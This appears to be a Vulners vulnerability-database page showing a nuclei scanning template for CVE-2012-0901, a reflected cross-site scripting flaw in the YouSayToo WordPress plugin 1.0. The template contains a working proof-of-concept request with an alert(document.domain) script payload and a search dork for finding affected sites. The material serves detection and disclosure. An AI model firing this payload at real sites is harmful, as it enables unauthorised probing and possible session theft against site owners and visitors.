Lucene search
K

YouSayToo auto-publishing 1.0 - Cross-Site Scripting

🗓️ 13 Jun 2026 13:20:29Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

YouSayToo auto-publishing 1.0 - Cross-Site Scripting vulnerability in WordPress plugi

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-0901
24 Jan 201200:00
circl
CVE
CVE-2012-0901
20 Jan 201217:00
cve
Cvelist
CVE-2012-0901
20 Jan 201217:00
cvelist
EUVD
EUVD-2012-0924
7 Oct 202500:30
euvd
NVD
CVE-2012-0901
20 Jan 201217:55
nvd
Patchstack
WordPress YouSayToo Auto-Publishing Plugin 1.0 - Cross Site Scripting
24 Jan 201200:00
patchstack
Prion
Cross site scripting
20 Jan 201217:55
prion
id: CVE-2012-0901

info:
  name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0901
    - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2012-0901
    cwe-id: CWE-79
    epss-score: 0.00191
    epss-percentile: 0.41034
    cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: attenzione
    product: yousaytoo
    google-query: "inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\""
  tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/plugins/yousaytoo-auto-publishing-plugin/'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220732a7ece0c817fbfdf1dcbd51ea0da1b4cc4efacd38e4691718f7397148440c4022020f5600c8ce1ee5c1fe53214822d694189ff2a28f3b2b924013954f2531e06b1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS 24.3
EPSS0.00191
16